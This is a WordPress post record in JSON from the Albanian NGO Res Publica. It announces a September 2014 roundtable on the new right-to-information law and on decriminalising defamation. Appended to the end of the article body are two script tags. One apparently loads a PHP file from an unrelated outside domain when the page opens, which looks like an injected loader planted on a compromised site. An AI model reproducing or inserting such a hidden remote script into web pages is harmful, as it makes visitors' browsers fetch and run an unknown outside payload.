{"id":726,"date":"2014-09-23T09:43:53","date_gmt":"2014-09-23T07:43:53","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=726"},"modified":"2014-10-07T02:03:45","modified_gmt":"2014-10-07T00:03:45","slug":"tryeze-advokimi-me-gazetare-dhe-aktiviste-te-shoqerise-civile-nxitja-e-ushtrimi-te-te-drejtes-se-informimit-dhe-dekriminalizimi-i-shpifjes","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=726","title":{"rendered":"Tryez\u00eb p\u00ebr t\u00eb drejt\u00ebn e informimit dhe dekriminalizimin e shpifjes\u201d"},"content":{"rendered":"<p style=\"text-align: left;\" align=\"center\"><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2014\/09\/shutterstock_78813541.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"size-medium wp-image-727 alignleft\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2014\/09\/shutterstock_78813541-277x300.jpg\" alt=\"shutterstock_78813541\" width=\"277\" height=\"300\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/09\/shutterstock_78813541-277x300.jpg 277w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2014\/09\/shutterstock_78813541.jpg 554w\" sizes=\"(max-width: 277px) 100vw, 277px\" \/><\/a>Me 30 shtator 2014, ne oren 10.00, ne ambientet e Hotel Tiranes, Res Publica therret gazetare dhe aktiviste te shoqerise civile ne nje tryez\u00eb advokimi me teme:\u00a0\u201cNxitja e ushtrimi t\u00eb t\u00eb drejt\u00ebs s\u00eb informimit dhe dekriminalizimi i shpifjes\u201d.\u00a0Tryeza synon t\u00eb shtroj\u00eb p\u00ebr diskutim s\u00eb bashku me gazetar\u00ebt dhe aktivist\u00ebt e shoq\u00ebris\u00eb civile, t\u00eb dy \u00e7\u00ebshtjeve me r\u00ebnd\u00ebsi p\u00ebr lirin\u00eb e shprehjes dhe t\u00eb informimit: nxitjen e ushtrimit t\u00eb t\u00eb drejt\u00ebs s\u00eb informimit dhe dekriminalizimin e shpifjes.<\/p>\n<p style=\"text-align: left;\" align=\"center\">E drejta e informimit sapo \u00ebsht\u00eb prekur nga nj\u00eb reform\u00eb rr\u00ebnj\u00ebsore. Zhvillimet e fundit kan\u00eb qen\u00eb shum\u00eb positive. Pak dit\u00eb m\u00eb par\u00eb, m\u00eb 18 shtator 2014, Kuvendi miratoi ligjin nr. 119\/2014 \u201cP\u00ebr t\u00eb drejt\u00ebn e informimit\u201d, i cili siguron n\u00eb duart e gazetar\u00ebve dhe aktivist\u00ebve t\u00eb shoq\u00ebris\u00eb civile nj\u00eb mjet shum\u00eb efektiv p\u00ebr t\u00eb siguruar informacion mbi dokumentat e organeve publike. Ligji i ri sjell shum\u00eb risi, afate m\u00eb t\u00eb shkurtra, m\u00eb shum\u00eb p\u00ebrgjegj\u00ebsi p\u00ebr autoritetet, m\u00eb shum\u00eb koordinim t\u00eb veprimeve dhe m\u00eb shum\u00eb informacion t\u00eb hedhur online. Ligji q\u00eb lam\u00eb pas ishte joefektiv, por me ligjin e ri duhet nisur nj\u00eb fushat\u00eb e re nd\u00ebrgjegj\u00ebsimi p\u00ebr t\u00eb nxitur d\u00ebshir\u00ebn tek t\u00eb gjith\u00eb q\u00eb t\u00eb p\u00ebrdorin t\u00eb drejtat e reja p\u00ebr t\u00eb b\u00ebr\u00eb qeverin\u00eb m\u00eb transparente dhe p\u00ebr t\u00eb denoncuar korrupsionin.<\/p>\n<p>P\u00ebr t\u00eb ndihmuar gazetar\u00ebt dhe aktivist\u00ebt e shoq\u00ebris\u00eb civile q\u00eb t\u00eb p\u00ebrdorin me efektivitet ligjin e ri, Res Publica ka p\u00ebrgatitur edhe nj\u00eb <b>Komentar <\/b>n\u00eb form\u00ebn e nj\u00eb libri me vler\u00eb praktike, i cili hedh drit\u00eb mbi kuptimin e detajeve t\u00eb ligjit, p\u00ebr t\u00eb kuptuar m\u00eb mir\u00eb risit\u00eb dhe \u00e7far\u00eb duhet patur kujdes.<\/p>\n<p>Megjith\u00eb zhvillimet pozitive t\u00eb m\u00ebsip\u00ebrme, situata nuk \u00ebsht\u00eb e favorshme p\u00ebr lirin\u00eb e shprehjes. Shpifja vijon t\u00eb mbetet ende nj\u00eb vep\u00ebr penale e parashikuar n\u00eb Kodin Penal , ndon\u00ebse nuk d\u00ebnohet me burgim. Gjobat penale t\u00eb parashikuara nga ligji jan\u00eb tep\u00ebr t\u00eb larta dhe t\u00eb pap\u00ebrshtatshme me nivelin e t\u00eb ardhurave t\u00eb gazetar\u00ebve. Gjithashtu regjistrimi i k\u00ebtyre d\u00ebnimeve n\u00eb d\u00ebshmin\u00eb e penalitetit \u00ebsht\u00eb nj\u00eb aspekt i kritikuar nga organizma nd\u00ebrkomb\u00ebtar\u00eb. Diskutimi n\u00eb k\u00ebt\u00eb tryez\u00eb synon t\u00eb nxis\u00eb pjes\u00ebmarr\u00ebsit p\u00ebr t\u00eb ngritur debatin publik q\u00eb t\u00eb b\u00ebj\u00eb ligjv\u00ebn\u00ebsin t\u00eb reflektoj\u00eb p\u00ebrball\u00eb argumenteve t\u00eb vlefsh\u00ebm.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Me 30 shtator 2014, ne oren 10.00, ne ambientet e Hotel Tiranes, Res Publica therret gazetare dhe aktiviste te shoqerise [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":727,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[4],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/726"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=726"}],"version-history":[{"count":6,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/726\/revisions"}],"predecessor-version":[{"id":767,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/726\/revisions\/767"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/727"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=726"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=726"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=726"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}